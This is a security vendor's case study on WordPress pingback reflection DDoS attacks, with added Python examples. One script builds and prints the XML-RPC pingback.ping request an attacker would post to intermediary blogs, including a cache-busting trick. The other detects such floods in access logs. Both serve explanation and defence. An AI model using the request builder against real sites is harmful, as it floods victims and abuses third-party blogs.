DDoS attack case study: WordPress pingback reflection attack (Prolexic podcast)


http://bit.ly/1pBadhD | The WordPress pingback function can be abused in powerful reflection attacks to flood a victim site with connections. Learn how this attack vector works and what you need to do to prevent your sites from participating in these attacks in the full Prolexic Q1 2014 DDoS attack report, available for a free download at http://bit.ly/1pBadhD.


  1. www.prolexic.com Case Study: A Reflected Application DDoS Attack – WordPress Pingback
  2. Overview • PLXsert has observed abuse of the WordPress pingback function in recent DDoS attack campaigns • This reflected application-layer attack vector abuses the pingback method exposed by WordPress's XML-RPC interface (xmlrpc.php) • WordPress applied fixes to limit this abuse, but reflection techniques still allow DDoS attackers to exploit it
  3. Characteristics of the WordPress pingback attack • Pingback is an automated function by which one site notifies another that it has linked to one of that site's posts • Attackers abuse it by crafting pingback requests whose claimed source URL is a page on the target; the intermediary site fetches that URL to verify the link, so its request lands on the target • The attack relies on a large number of intermediary WordPress sites (themselves victims) that have the pingback function turned on
  4. Characteristics of the WordPress pingback attack (cont) • During an attack, hundreds of thousands of such WordPress sites could be abused to generate pingback verification requests to the target site • The attack vector succeeds by exhausting the target's connection capacity and consuming its bandwidth
  5. How does the WordPress pingback attack work? • Malicious actors send custom XML-RPC POST requests (pingback.ping) to an intermediary WordPress site's xmlrpc.php • Each request names a URL on the target as the source of the link, so it appears to originate from the target; no IP spoofing is needed, which is what makes the vector so easy to use • The intermediary's verification fetch, and thus its response, is reflected onto the target, once per request
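The exchange described on slide 5, as an added Python example that is not from the Prolexic deck or from WordPress itself: it builds the XML-RPC pingback.ping body the attacker posts to the intermediary's xmlrpc.php and shows which URL the intermediary will then fetch to verify the link. The host names and the cache-busting query string are hypothetical.

```python
import xmlrpc.client
from typing import Optional, Tuple

# Hypothetical hosts, not from the slide deck.
REFLECTOR_HOST = "reflector.example"                # intermediary WordPress site with pingbacks on
REFLECTOR_POST = f"http://{REFLECTOR_HOST}/?p=42"   # any post on the intermediary that accepts pingbacks
TARGET_PAGE = "http://victim.example/?p=1"          # page on the target the attacker wants flooded


def build_pingback_request(source_uri: str, target_uri: str,
                           cache_buster: Optional[str] = None) -> bytes:
    """XML-RPC body of pingback.ping(sourceURI, targetURI).

    A legitimate call means "page sourceURI links to your page targetURI".
    In the reflection attack sourceURI is a page on the target, so the
    intermediary's link-verification fetch is addressed to the target.
    Attackers commonly append a random query string (cache_buster, assumed
    here) so every verification fetch misses any cache in front of the target.
    """
    if cache_buster:
        sep = "&" if "?" in source_uri else "?"
        source_uri = f"{source_uri}{sep}{cache_buster}"
    return xmlrpc.client.dumps((source_uri, target_uri),
                               methodname="pingback.ping").encode("utf-8")


def render_http_post(host: str, body: bytes) -> str:
    """Full HTTP request as sent to the intermediary's xmlrpc.php.

    The attacker's own address is not spoofed: this is an ordinary TCP
    connection, which is why the vector needs no special network position.
    """
    return (
        "POST /xmlrpc.php HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: text/xml\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body.decode('utf-8')}"
    )


def parse_pingback_request(body: bytes) -> Tuple[str, str]:
    """What the intermediary's XML-RPC server decodes: (sourceURI, targetURI)."""
    params, method = xmlrpc.client.loads(body.decode("utf-8"))
    if method != "pingback.ping" or len(params) != 2:
        raise ValueError("not a pingback.ping call")
    source_uri, target_uri = params
    return source_uri, target_uri


def reflected_fetch_url(body: bytes) -> str:
    """URL the intermediary GETs while verifying the pingback.

    WordPress fetches sourceURI to confirm it really links to targetURI;
    that GET is the reflected traffic that reaches the target.
    """
    source_uri, _target_uri = parse_pingback_request(body)
    return source_uri


if __name__ == "__main__":
    body = build_pingback_request(TARGET_PAGE, REFLECTOR_POST, cache_buster="4711")
    print(render_http_post(REFLECTOR_HOST, body))
    print("intermediary will fetch:", reflected_fetch_url(body))
```

Every such POST costs the attacker one small request and costs the target one full page fetch from a third party's IP, which is the reflection and the reason connection counts at the target climb so fast.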
  6. Actual campaign from Q1 2014 • One campaign targeting an Internet media company peaked at 50,000 connections per second and lasted nearly 9 hours • This attack was based entirely on the WordPress pingback vector
  7. Traffic distribution of the real attack (chart slide; the chart is not reproduced here)
  8. Pingback best practices • The WordPress pingback attack is not new, but has recently regained popularity • Administrators are strongly encouraged to disable the pingback feature; note that unchecking "Allow link notifications from other blogs" under Settings > Discussion only changes the default for new posts, whereas removing pingback.ping from the XML-RPC method list (the xmlrpc_methods filter) or restricting access to xmlrpc.php covers the whole site • Many WordPress sites cannot afford to abandon this feature, and there may be no alternative services available • DDoS mitigation in this case is a daunting task, but it is well managed by specialized mitigation providers such as Prolexic
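For the target side of the best practices above, an added Python example that is not from the Prolexic report (whose own detection rules are not reproduced on this page): it picks pingback verification fetches out of Apache combined-format access logs and tallies which intermediary sites are doing the reflecting. It relies on the User-Agent WordPress sends on that fetch, `WordPress/<version>; <site URL>; verifying pingback from <IP>`, where the IP is the address the intermediary saw the pingback request arrive from. The log lines are constructed, and the 50% share threshold is an assumption to be tuned per site.

```python
import re
from collections import Counter
from typing import Dict, Iterable, List

# Apache "combined" format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# User-Agent WordPress uses for the GET that verifies a pingback's sourceURI.
PINGBACK_UA_RE = re.compile(
    r'^WordPress/(?P<version>[^;]+); (?P<site>https?://[^;]+); '
    r'verifying pingback from (?P<origin>\S+)$'
)

# Constructed sample, not real traffic: three reflectors hitting the target's
# front page with cache-busting query strings, interleaved with ordinary visitors.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Mar/2014:14:02:11 +0000] "GET /?p=1&883201 HTTP/1.0" 200 15213 "-" "WordPress/3.8.1; http://blog-a.example; verifying pingback from 198.51.100.7"
198.51.100.44 - - [10/Mar/2014:14:02:11 +0000] "GET /about/ HTTP/1.1" 200 4021 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/27.0"
203.0.113.10 - - [10/Mar/2014:14:02:12 +0000] "GET /?p=1&116480 HTTP/1.0" 200 15213 "-" "WordPress/3.8.1; http://blog-a.example; verifying pingback from 198.51.100.7"
203.0.113.25 - - [10/Mar/2014:14:02:12 +0000] "GET /?p=1&550932 HTTP/1.0" 200 15213 "-" "WordPress/3.7.1; http://blog-b.example; verifying pingback from 198.51.100.7"
192.0.2.200 - - [10/Mar/2014:14:02:12 +0000] "GET /?p=1&903374 HTTP/1.0" 200 15213 "-" "WordPress/3.8; https://blog-c.example; verifying pingback from 198.51.100.9"
198.51.100.45 - - [10/Mar/2014:14:02:13 +0000] "GET /feed/ HTTP/1.1" 304 - "-" "Feedly/1.0"
"""


def parse_pingback_hits(lines: Iterable[str]) -> List[Dict[str, str]]:
    """One record per request carrying the pingback-verification User-Agent."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue                        # not combined format; skip rather than guess
        ua = PINGBACK_UA_RE.match(m.group("ua"))
        if not ua:
            continue
        hits.append({
            "client": m.group("client"),     # IP of the intermediary WordPress site
            "site": ua.group("site"),        # the intermediary's own URL (who to notify/block)
            "version": ua.group("version"),
            "origin": ua.group("origin"),    # IP that sent the pingback to the intermediary
            "request": m.group("request"),
        })
    return hits


def summarize(lines: Iterable[str]) -> Dict[str, object]:
    """Counts a responder wants: share of traffic that is pingback fetches, which
    intermediary sites are behind it, and which origin IPs they report."""
    lines = [l for l in lines if l.strip()]
    hits = parse_pingback_hits(lines)
    total = len(lines)
    return {
        "total_requests": total,
        "pingback_requests": len(hits),
        "pingback_share": len(hits) / total if total else 0.0,
        "reflectors": Counter(h["site"] for h in hits),
        "origins": Counter(h["origin"] for h in hits),
    }


def is_pingback_flood(lines: Iterable[str], share_threshold: float = 0.5) -> bool:
    """Crude trigger: pingback fetches dominate the window. A busy blog receives
    a legitimate trickle of these, so tune the threshold (assumed 50% here)."""
    return summarize(lines)["pingback_share"] >= share_threshold


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG.splitlines())
    print(f"{s['pingback_requests']}/{s['total_requests']} requests are pingback fetches")
    for site, n in s["reflectors"].most_common():
        print(f"  {n:>3}  {site}")
    print("flood:", is_pingback_flood(SAMPLE_LOG.splitlines()))
```

The "verifying pingback from" address is whatever the intermediary saw, so it points at the attacker's machine or proxy rather than the target, which is unusual for a reflection attack and worth recording; the `site` field gives the list of WordPress installations whose owners need to be told to turn pingbacks off.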
  9. Q1 2014 Global Attack Report • Download the Q1 2014 Global DDoS Attack Report • The Q1 2014 report covers: – Detection rules for WordPress pingback attacks – Analysis of recent DDoS attack trends – Breakdown of average Gbps/Mpps statistics – Year-over-year and quarter-by-quarter analysis – Types and frequency of application layer attacks – Types and frequency of infrastructure attacks – Trends in attack frequency, size and sources – Where and when DDoSers launch attacks – Case study and analysis
  10. About Prolexic • Prolexic Technologies, now part of Akamai, has successfully stopped DDoS attacks for more than a decade • Our global DDoS mitigation network and 24/7 security operations center (SOC) can stop even the largest attacks that exceed the capabilities of other DDoS mitigation service providers
